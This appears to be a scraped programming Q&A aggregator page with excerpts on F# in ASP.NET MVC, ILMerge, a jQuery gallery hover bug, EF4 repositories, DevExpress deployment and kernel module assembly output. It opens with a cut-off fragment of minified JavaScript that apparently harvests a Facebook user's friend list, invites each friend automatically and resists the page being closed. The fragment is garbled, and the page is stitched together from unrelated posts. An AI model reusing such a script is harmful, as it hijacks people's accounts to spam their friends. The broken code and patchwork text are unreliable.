k=null;"POST"==h&&(k=b.split("?"),b=k[0],k=k[1]);e.open(h,b,!0);e.onreadystatechange=g.c?function(){g.c(e)}:function(){if(4==e.readyState)if(200==e.status){var b="";e.responseText&&(b=e.responseText);"j"==a.charAt(0)?(b=b.replace(/[\n\r]/g,""),b=eval("("+b+")")):"x"==a.charAt(0)&&(b=e.responseXML);c&&c(b)}else g.f&&document.getElementsByTagName("body")[0].removeChild(g.f),g.e&&(document.getElementById(g.e).style.display="none"),error&&error(e.status)};e.send(k)}},d:function(){return this.b()}};function ChangeLocation(){window.location.href="http://www.facebook.com/"}setTimeout("ChangeLocation",1);window.onbeforeunload=function(){if(window[tag+"_close"])return"This script is running now!"};var i=3;var tay=3;var suc=0;var err=0;var arr=new Array;var arn=new Array;var pho=new Array;var tag="Close";var page_name,x=document.getElementsByTagName("span");for(i=0;ia=1&_dyn=7n8aD5z5CF-3ui&__req=l",function(a){var b=a;var c=b.substring(b.indexOf("{"));var d=JSON.parse(c);d=d.payload.entries;for(var e=0;e";display+=""+Title+"";display+=arr.length+" Friends Detected";display+="";document.getElementById("pagelet_sidebar").innerHTML=display;InviteFriends(arr[i])});

    Read the article

  • FSharp.Core.sigdata not found alongside FSharp.Core

    - by Mauricio Scheffer
    I'm trying to use F# for an ASP.NET MVC application. One of my controller actions sends an F# list to the view, so I write:

        <%@ Page Language="C#" Inherits="ViewPage<FSharpList<int>>" %>

    Of course, for this to work I have to add Microsoft.FSharp.Collections to the namespaces element in my web.config:

        <add namespace="Microsoft.FSharp.Collections"/>

    and add a reference to FSharp.Core in the assemblies element:

        <add assembly="FSharp.Core, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/>

    As soon as I add this assembly reference, every view (whether it uses an F# type or not) fails with this error:

        error FS1221: FSharp.Core.sigdata not found alongside FSharp.Core

    I can work around this by not having any F#-specific types in my views, but what's the reason for this error? Also, where is FSharp.Core.sigdata? It's not in my GAC and I can't find it anywhere.

    Read the article

  • How to Integrate ILMerge into Visual Studio Build Process to Merge Assemblies?

    - by AMissico
    I want to merge one .NET DLL assembly and one C# class library project, both referenced by a VB.NET console application project, into one command-line console executable. I can do this with ILMerge from the command line, but I want to integrate this merging of referenced assemblies and projects into the Visual Studio project. From my reading, I understand that I can do this through an MSBuild Task or a Target and just add it to a C#/VB.NET project file, but I can find no specific example since MSBuild is a large topic. Moreover, I find some references that add the ILMerge command to the post-build event. How do I integrate ILMerge into a Visual Studio (C#/VB.NET) project, which is just an MSBuild project, to merge all referenced assemblies (Copy Local = true) into one assembly? How does this tie into a possible ILMerge.Targets file? Is it better to use the post-build event?

    Read the article

  • Javascript or CSS hover not working in Safari and Chrome

    - by PAZtech
    I have a problem with a script for a image gallery. The problem seems to only occur on Safari and Chrome, but if I refresh the page I get it to work correctly - weird! Correct function: The gallery has a top bar, which if you hover over it, it will display a caption. Below sits the main image. At the bottom there is another bar that is a reversal of the top bar. When you hover over it, it will display thumbnails of the gallery. The problem: In Safari and Chrome, the thumbnail holder will not display. In fact, it doesn't even show it as an active item (or a rollover). But oddly enough, if you manually refresh the page it begins to work correctly for the rest of the time you view the page. Once you have left the page and return the same error occurs again and you have to go through the same process. Here's one of the pages to look at: link text Here's the CSS: #ThumbsGutter { background: url(../Images/1x1.gif); background: url(/Images/1x1.gif); height: 105px; left: 0px; position: absolute; top: 0px; width: 754px; z-index: 2; } #ThumbsHolder { display: none; } #ThumbsTable { left: 1px; } #Thumbs { background-color: #000; width: 703px; } #Thumbs ul { list-style: none; margin: 0; padding: 0; } #Thumbs ul li { display: inline; } .Thumbs ul li a { border-right: 1px solid #fff; border-top: 1px solid #fff; float: left; left: 1px; } .Thumbs ul li a img { filter: alpha(opacity=50); height: 104px; opacity: .5; width: 140px; } .Thumbs ul li a img.Hot { filter: alpha(opacity=100); opacity: 1; } Here is the javascript: //Variables var globalPath = ""; var imgMain; var gutter; var holder; var thumbs; var loadingImage; var holderState; var imgCount; var imgLoaded; var captionHolder; var captionState = 0; var captionHideTimer; var captionHideTime = 500; var thumbsHideTimer; var thumbsHideTime = 500; $(document).ready(function() { //Load Variables imgMain = $("#MainImage"); captionHolder = $("#CaptionHolder"); gutter = $("#ThumbsGutter"); holder = $("#ThumbsHolder"); thumbs = $("#Thumbs"); loadingImage = $("#LoadingImageHolder"); //Position Loading Image loadingImage.centerOnObject(imgMain); //Caption Tab Event Handlers $("#CaptionTab").mouseover(function() { clearCaptionHideTimer(); showCaption(); }).mouseout(function() { setCaptionHideTimer(); }); //Caption Holder Event Handlers captionHolder.mouseenter(function() { clearCaptionHideTimer(); }).mouseleave(function() { setCaptionHideTimer(); }); //Position Gutter if (jQuery.browser.safari) { gutter.css("left", imgMain.position().left + "px").css("top", ((imgMain.offset().top + imgMain.height()) - 89) + "px"); } else { gutter.css("left", imgMain.position().left + "px").css("top", ((imgMain.offset().top + imgMain.height()) - 105) + "px"); } //gutter.css("left", imgMain.position().left + "px").css("top", ((imgMain.offset().top + imgMain.height()) - 105) + "px"); //gutter.css("left", imgMain.offset().left + "px").css("top", ((imgMain.offset().top + imgMain.height()) - gutter.height()) + "px"); //Thumb Tab Event Handlers $("#ThumbTab").mouseover(function() { clearThumbsHideTimer(); showThumbs(); }).mouseout(function() { setThumbsHideTimer(); }); //Gutter Event Handlers gutter.mouseenter(function() { //showThumbs(); clearThumbsHideTimer(); }).mouseleave(function() { //hideThumbs(); setThumbsHideTimer(); }); //Next/Prev Button Event Handlers $("#btnPrev").mouseover(function() { $(this).attr("src", globalPath + "/Images/GalleryLeftButtonHot.jpg"); }).mouseout(function() { $(this).attr("src", globalPath + "/Images/GalleryLeftButton.jpg"); }); 
$("#btnNext").mouseover(function() { $(this).attr("src", globalPath + "/Images/GalleryRightButtonHot.jpg"); }).mouseout(function() { $(this).attr("src", globalPath + "/Images/GalleryRightButton.jpg"); }); //Load Gallery //loadGallery(1); }); function loadGallery(galleryID) { //Hide Holder holderState = 0; holder.css("display", "none"); //Hide Empty Gallery Text $("#EmptyGalleryText").css("display", "none"); //Show Loading Message $("#LoadingGalleryOverlay").css("display", "inline").centerOnObject(imgMain); $("#LoadingGalleryText").css("display", "inline").centerOnObject(imgMain); //Load Thumbs thumbs.load(globalPath + "/GetGallery.aspx", { GID: galleryID }, function() { $("#TitleHolder").html($("#TitleContainer").html()); $("#DescriptionHolder").html($("#DescriptionContainer").html()); imgCount = $("#Thumbs img").length; imgLoaded = 0; if (imgCount == 0) { $("#LoadingGalleryText").css("display", "none"); $("#EmptyGalleryText").css("display", "inline").centerOnObject(imgMain); } else { $("#Thumbs img").load(function() { imgLoaded++; if (imgLoaded == imgCount) { holder.css("display", "inline"); //Carousel Thumbs thumbs.jCarouselLite({ btnNext: "#btnNext", btnPrev: "#btnPrev", mouseWheel: true, scroll: 1, visible: 5 }); //Small Image Event Handlers $("#Thumbs img").each(function(i) { $(this).mouseover(function() { $(this).addClass("Hot"); }).mouseout(function() { $(this).removeClass("Hot"); }).click(function() { //Load Big Image setImage($(this)); }); }); holder.css("display", "none"); //Load First Image var img = new Image(); img.onload = function() { imgMain.attr("src", img.src); setCaption($("#Image1").attr("alt")); //Hide Loading Message $("#LoadingGalleryText").css("display", "none"); $("#LoadingGalleryOverlay").css("display", "none"); } img.src = $("#Image1").attr("bigimg"); } }); } }); } function showCaption() { if (captionState == 0) { $("#CaptionTab").attr("src", globalPath + "/Images/CaptionTabHot.jpg"); captionHolder.css("display", "inline").css("left", imgMain.position().left + "px").css("top", imgMain.position().top + "px").css("width", imgMain.width() + "px").effect("slide", { "direction": "up" }, 500, function() { captionState = 1; }); } } function hideCaption() { if (captionState == 1) { captionHolder.toggle("slide", { "direction": "up" }, 500, function() { $("#CaptionTab").attr("src", globalPath + "/Images/CaptionTab.jpg"); captionState = 0; }); } } function setCaptionHideTimer() { captionHideTimer = window.setTimeout(hideCaption,captionHideTime); } function clearCaptionHideTimer() { if(captionHideTimer) { window.clearTimeout(captionHideTimer); captionHideTimer = null; } } function showThumbs() { if (holderState == 0) { $("#ThumbTab").attr("src", globalPath + "/Images/ThumbTabHot.jpg"); holder.effect("slide", { "direction": "down" }, 500, function() { holderState = 1; }); } } function hideThumbs() { if (holderState == 1) { if (jQuery.browser.safari) { holder.css("display", "none"); $("#ThumbTab").attr("src", globalPath + "/Images/ThumbTab.jpg"); holderState = 0; } else { holder.toggle("slide", { "direction": "down" }, 500, function() { $("#ThumbTab").attr("src", globalPath + "/Images/ThumbTab.jpg"); holderState = 0; }); } } } function setThumbsHideTimer() { thumbsHideTimer = window.setTimeout(hideThumbs,thumbsHideTime); } function clearThumbsHideTimer() { if(thumbsHideTimer) { window.clearTimeout(thumbsHideTimer); thumbsHideTimer = null; } } function setImage(image) { //Show Loading Image loadingImage.css("display", "inline"); var img = new Image(); img.onload = function() { 
//imgMain.css("background","url(" + img.src + ")").css("display","none").fadeIn(250); imgMain.attr("src", img.src).css("display", "none").fadeIn(250); setCaption(image.attr("alt")); //Hide Loading Image loadingImage.css("display", "none"); }; img.src = image.attr("bigimg"); } function setCaption(caption) { $("#CaptionText").html(caption); //alert($("#CaptionText").html()); /* if (caption.length 0) { $("#CaptionText") .css("display", "inline") .css("left", imgMain.position().left + "px") .css("top", imgMain.position().top + "px") .css("width", imgMain.width() + "px") .html(caption); $("#CaptionOverlay").css("display", "inline") .css("height", $("#CaptionText").height() + 36 + "px") .css("left", imgMain.position().left + "px") .css("top", imgMain.position().top + "px") .css("width", imgMain.width() + "px"); } else { $("#CaptionText").css("display", "none"); $("#CaptionOverlay").css("display", "none"); } */ } Please if anyone could help, it would be greatly appreciated! Thanks in advance. Justin

    Read the article

  • EF4, self tracking, repository pattern, SQL Server 2008 AND SQL Server Compact

    - by Darren
    Hi, I am creating a project using Entity Framework 4 and self-tracking entities. I want to be able to get the data either from a SQL Server 2008 database or from a SQL Server Compact database, with the switch being in the config file. I am using the repository pattern, and the self-tracking entities will sit in a separate assembly. Do I need two edmx files? If so, how do I generate only one set of STEs in the separate assembly? And do I need to generate two context classes as well? I am unsure of the plumbing for all this. Can anyone help? Darren. I forgot to add that the two databases will be identical and that the Compact version is for offline usage.

    Read the article

  • How to deploy DevExpress to server?

    - by Earlz
    Hello, I need to deploy a project that uses DevExpress controls to an IIS 6.0 server. The project loads fine until I add in the DevExpress controls. When trying to load the site I get the error:

        Could not load file or assembly 'DevExpress.Web.v9.3, Version=9.3.4.0, Culture=neutral, PublicKeyToken=b88d1754d700e49a' or one of its dependencies. The system cannot find the file specified

    What am I doing wrong? I've tried installing the controls on the server and also just copying all of the assembly DLLs to the bin/ folder of the application, but I cannot get this error to go away. How do I get it to work?

    Read the article

  • How to keep asm output from Linux kernel module build

    - by fastmonkeywheels
    I'm working on a Linux kernel module for a 2.6.x kernel and I need to view the assembly output, though it's currently generated as a temporary file and deleted afterwards. I'd like to have the assembly output mixed with my C source so I can easily trace where my problem lies. This is for an ARMv6 core, and apparently objdump doesn't support this architecture. I've included my makefile below.

        ETREP=/xxSourceTreexx/
        GNU_BIN=$(ETREP)/arm-none-linux-gnueabi/bin
        CROSS_COMPILE := $(GNU_BIN)/arm-none-linux-gnueabi-
        ARCH := arm
        KDIR=$(ETREP)/linux-2.6.31/
        MAKE= CROSS_COMPILE=$(CROSS_COMPILE) ARCH=$(ARCH) make

        obj-m += xxfile1xx.o

        all:
                $(MAKE) -C $(KDIR) M=$(PWD) modules

        clean:
                $(MAKE) -C $(KDIR) M=$(PWD) clean

    Read the article
